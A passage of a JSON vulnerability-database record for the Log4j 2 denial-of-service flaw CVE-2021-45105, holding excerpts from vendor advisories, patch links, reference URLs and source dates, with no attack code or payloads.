v1\n\niQIVAwUBYemZbtzjgjWX9erEAQgkThAAhlH9r6fZ08ZbIvy7t5FNceA93qd12PsL\nbJEZ9axgCc1hrxm5hK2W6x55a2tKQ0ieoFlkF87qZ5FSsEmOWfvCa5Jsr04bGkhI\nQBiyZvX+de8ZAUcbiXwgsb3LwfY5DAOoLZVZj7tWsxXcl9CG/MGqI452b5jB4oWa\n5TXa8YHSz9/vQHtJGmjyuZYJGfH63XvLUu6qHEgCHKhXEQg5p9YrfjbdZWk77mSk\nN+dqHpXJFo2G+UURxBy615ebIgxA1dUR6pdbCfm/fbUAxnxWPubjNLLGShCUNBP9\n/WgSMiv5GT48yhpK0IdTpPmQUAQW3fkgEd58vytgDuQf/7NhsbNFlsj3hugnAmY9\nB/Jtwri/dCaOy0EDlDTc22OX7uDXaoSd9t5kjFAiZMOhxRE0hXawGfCxdGq/rgV6\nEblcKQ3zW/3lsTj5KdI+0M0kNA6y1i0KP+Iujs12WLzWDANcpyvpuNu5qIMoM16Y\niy4QLJkWFcH99toKO6/bEFgINq3C84sDEQNUpgwga+ct5mxsZycn3vSl9QcuoWQD\nFX9lwXBaxGuvBb/K3pwXfJuRQOFn2tDpwqN0PnyG/4+QLHunSPuQ8vcVx+oG9a2K\nLpiYxMQawsJiOjEyNUdRt7DDBpU/mVO+pf7lCY/4F5S+xOJ6E6LkJ213aSGaYPBd\nQiLGYFSmmLk=\n=y5SE\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat AMQ Streams, based on the Apache Kafka project, offers a\ndistributed backbone that allows microservices and other applications to\nshare data with extremely high throughput and extremely low latency. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.4.4 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7\nJBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1\nJBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034\nJBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17)\nJBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console\nJBEAP-22839 - [GSS](7.4.z) Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001\nJBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001\nJBEAP-22899 - Tracker bug for the EAP 7.4.4 release for RHEL-7\nJBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002\nJBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001\nJBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001\nJBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001\nJBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002\nJBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final\nJBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final\nJBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001\nJBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final\nJBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001\nJBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26\nJBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001\nJBEAP-23323 - [GSS](7.4.z) WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend\nJBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\nJBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001\nJBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\n\n7. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. Description:\n\nRed Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2073 - The elasticsearch-im-xxx job failed when trying to start index management process for a non-existent(empty-named) index [openshift-logging-5.2]\nLOG-2087 - resourceVersion is overflowing type Integer causing ES rejection\n\n6. =========================================================================\nUbuntu Security Notice USN-5222-1\nJanuary 11, 2022\n\napache-log4j2 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 21.04\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. \n(CVE-2021-45105)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n liblog4j2-java 2.17.1-0.21.10.1\n\nUbuntu 21.04:\n liblog4j2-java 2.17.1-0.21.04.1\n\nUbuntu 20.04 LTS:\n liblog4j2-java 2.17.1-0.20.04.1\n\nUbuntu 18.04 LTS:\n liblog4j2-java 2.12.4-0ubuntu0.1\n\nIn general, a standard system update will make all the necessary changes. \n\nFor the oldstable distribution (buster), this problem has been fixed\nin version 2.17.0-1~deb10u1. \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 2.17.0-1~deb11u1. \n\nWe recommend that you upgrade your apache-log4j2 packages. \n\nFor the detailed security status of apache-log4j2 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/apache-log4j2\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmG+Ro1fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeQVuBAArOperYABsLeaPcs3DgNxHcDDUNGCcvo5fsBtkh+MDvHMspqOb8VqLShx\nBtzPJGE0UTdBrfAqWeuMCbV1LdBYfwRUlrUyZiQXBiEx5BI5vDB4vaDUtAomwC6o\nvnbJwDlvlpoSwbURcls/Z0Hs15gwHX2D/lSa+j+NSxaNCkEOqvjr8dbpnHMSIbwz\nf0hSWQm4jydadUHP/zXSwN+LeZrJs+uP1tIdajtZjr6VoPkV48EDxCctaVttn27q\n9DrGM9RjKGyCCKB/WrWToRbv/Mke20AJ4SOWoDdy1u/m2wcgW3pv1cap7J3RRjYO\nK5V5qacdJDo9FWoRkb1ftXlanyVe5DyI+j/9un+uZLSlOkeTha+hP+Tj2P/sx/Z4\nxbpmPRGJ+O/BuxoPXUJNSTkh7vLu0CJkCfzi3Gj24c22jkBV3POJ7iZsFvNbJHAi\n3i6VBc7e6tcqdiIhZqj/+odu2rCqeYqMbvhLL/slnQQVU4YMn3F1FtPWEpfAmQzP\nYCg2vLei5rTt3dYjA5aBluJPEPXO5rA5nZa3xq5hbzAJMl/m1yU9K6v73mCk9gnK\nyFHoaD+Ls97tPCMiO/56kIQecLv5s7GuuwLQlC8rm9TgXzl/m6rqst7a93IcsnV9\nP+f2RZsciOyXo1N4zhakNkZ4dkmRZCfm9xCfeqAKUQgqVPXhBtE=\n=Wkr6\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-45105"
},
{
"db": "ZDI",
"id": "ZDI-21-1541"
},
{
"db": "VULHUB",
"id": "VHN-408743"
},
{
"db": "VULMON",
"id": "CVE-2021-45105"
},
{
"db": "PACKETSTORM",
"id": "165645"
},
{
"db": "PACKETSTORM",
"id": "165648"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "166793"
},
{
"db": "PACKETSTORM",
"id": "165499"
},
{
"db": "PACKETSTORM",
"id": "165497"
},
{
"db": "PACKETSTORM",
"id": "165373"
},
{
"db": "PACKETSTORM",
"id": "165516"
},
{
"db": "PACKETSTORM",
"id": "169176"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-45105",
"trust": 2.8
},
{
"db": "ZDI",
"id": "ZDI-21-1541",
"trust": 1.8
},
{
"db": "CERT/CC",
"id": "VU#930724",
"trust": 1.1
},
{
"db": "SIEMENS",
"id": "SSA-501673",
"trust": 1.1
},
{
"db": "SIEMENS",
"id": "SSA-479842",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/19/1",
"trust": 1.1
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-16160",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165516",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165373",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165499",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165497",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165648",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165645",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165637",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165503",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165552",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165649",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165494",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165636",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165650",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165632",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2021-101661",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-408743",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-45105",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166677",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166793",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169176",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
},
{
"db": "VULHUB",
"id": "VHN-408743"
},
{
"db": "VULMON",
"id": "CVE-2021-45105"
},
{
"db": "PACKETSTORM",
"id": "165645"
},
{
"db": "PACKETSTORM",
"id": "165648"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "166793"
},
{
"db": "PACKETSTORM",
"id": "165499"
},
{
"db": "PACKETSTORM",
"id": "165497"
},
{
"db": "PACKETSTORM",
"id": "165373"
},
{
"db": "PACKETSTORM",
"id": "165516"
},
{
"db": "PACKETSTORM",
"id": "169176"
},
{
"db": "NVD",
"id": "CVE-2021-45105"
}
]
},
"id": "VAR-202112-1782",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-408743"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:48:18.949000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Apache has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"title": "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221462 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-45105: Certain strings can cause infinite recursion",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=9cdbf0a2dc2003562c697ebd1bd08570"
},
{
"title": "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221469 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat Single Sign-On 7.5.2 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221463 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-5024-1 apache-log4j2 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=affead52a755f931c66032144a27568d"
},
{
"title": "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221299 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221296 - Security Advisory"
},
{
"title": "Red Hat: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221297 - Security Advisory"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1733",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1733"
},
{
"title": "IBM: Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization \u00e2\u20ac\u201c Apache Log4j \u00e2\u20ac\u201c [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1239b8de81ba381055ce95c571a45bea"
},
{
"title": "IBM: Security Bulletin: Hortonworks DataFlow product has log messages vulnerable to arbitrary code execution, denial of service, and remote code execution due to Apache Log4j vulnerabilities [CVE-2021-44228], [CVE-2021-45105], and [CVE-2021-45046]",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7803153fe3afe7b4246685257610b110"
},
{
"title": "IBM: An update on the Apache Log4j 2.x vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0648a3f00f067d373b069c4f2acd5db4"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=1b15bf8c16ace8f01272aa507f950804"
},
{
"title": "Amazon Linux 2022: ALAS2022-2021-008",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2021-008"
},
{
"title": "Cisco: Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-apache-log4j-qRuKNEbd"
},
{
"title": "Citrix Security Bulletins: Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=f1a2b6f4f4568786daf1fc5e893e9283"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=6aac0ed5554d7c299f07f7ce8ad8be79"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=42e3d15623cd7650d7ccb17534ee39a8"
},
{
"title": "CVE-2021-45105",
"trust": 0.1,
"url": "https://github.com/tejas-nagchandi/CVE-2021-45105 "
},
{
"title": "log4j2_dos_exploit",
"trust": 0.1,
"url": "https://github.com/iAmSOScArEd/log4j2_dos_exploit "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
},
{
"db": "VULMON",
"id": "CVE-2021-45105"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.1
},
{
"problemtype": "CWE-674",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-408743"
},
{
"db": "NVD",
"id": "CVE-2021-45105"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"trust": 1.1,
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"trust": 1.1,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-log4j-qruknebd"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"
},
{
"trust": 1.1,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0032"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20211218-0001/"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2021/dsa-5024"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.1,
"url": "https://www.zerodayinitiative.com/advisories/zdi-21-1541/"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2021/12/19/1"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45105"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-45105"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44832"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.3,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45046"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44832"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45046"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20321"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42574"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3712"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=data.grid\u0026version=8.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0205"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=1.6.6"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38153"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23307"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23302"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4104"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1296"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23302"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23307"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4104"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1462"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36327"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0044"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0043"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.0-0.21.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.0-0.21.10.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5203-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.0-0.20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.21.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.12.4-0ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5222-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.17.1-0.21.10.1"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/apache-log4j2"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
},
{
"db": "VULHUB",
"id": "VHN-408743"
},
{
"db": "PACKETSTORM",
"id": "165645"
},
{
"db": "PACKETSTORM",
"id": "165648"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "166793"
},
{
"db": "PACKETSTORM",
"id": "165499"
},
{
"db": "PACKETSTORM",
"id": "165497"
},
{
"db": "PACKETSTORM",
"id": "165373"
},
{
"db": "PACKETSTORM",
"id": "165516"
},
{
"db": "PACKETSTORM",
"id": "169176"
},
{
"db": "NVD",
"id": "CVE-2021-45105"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "ZDI",
"id": "ZDI-21-1541",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-408743",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-45105",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165645",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165648",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166677",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166793",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165499",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165497",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165373",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165516",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169176",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-45105",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-12-19T00:00:00",
"db": "ZDI",
"id": "ZDI-21-1541",
"ident": null
},
{
"date": "2021-12-18T00:00:00",
"db": "VULHUB",
"id": "VHN-408743",
"ident": null
},
{
"date": "2021-12-18T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45105",
"ident": null
},
{
"date": "2022-01-20T18:11:03",
"db": "PACKETSTORM",
"id": "165645",
"ident": null
},
{
"date": "2022-01-21T15:28:58",
"db": "PACKETSTORM",
"id": "165648",
"ident": null
},
{
"date": "2022-04-11T17:15:55",
"db": "PACKETSTORM",
"id": "166677",
"ident": null
},
{
"date": "2022-04-21T15:08:12",
"db": "PACKETSTORM",
"id": "166793",
"ident": null
},
{
"date": "2022-01-10T17:56:39",
"db": "PACKETSTORM",
"id": "165499",
"ident": null
},
{
"date": "2022-01-10T17:55:11",
"db": "PACKETSTORM",
"id": "165497",
"ident": null
},
{
"date": "2021-12-20T16:23:09",
"db": "PACKETSTORM",
"id": "165373",
"ident": null
},
{
"date": "2022-01-12T15:36:56",
"db": "PACKETSTORM",
"id": "165516",
"ident": null
},
{
"date": "2021-12-28T20:12:00",
"db": "PACKETSTORM",
"id": "169176",
"ident": null
},
{
"date": "2021-12-18T12:15:07.433000",
"db": "NVD",
"id": "CVE-2021-45105",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-19T00:00:00",
"db": "ZDI",
"id": "ZDI-21-1541",
"ident": null
},
{
"date": "2022-10-06T00:00:00",
"db": "VULHUB",
"id": "VHN-408743",
"ident": null
},
{
"date": "2022-10-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45105",
"ident": null
},
{
"date": "2024-11-21T06:31:58.170000",
"db": "NVD",
"id": "CVE-2021-45105",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "165373"
},
{
"db": "PACKETSTORM",
"id": "165516"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Apache Log4j StrSubstitutor Uncontrolled Recursion Denial-of-Service Vulnerability",
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1541"
}
],
"trust": 0.7
},
"type": {
"_id": null,
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "165645"
},
{
"db": "PACKETSTORM",
"id": "165516"
}
],
"trust": 0.2
}
}
VAR-200911-0398
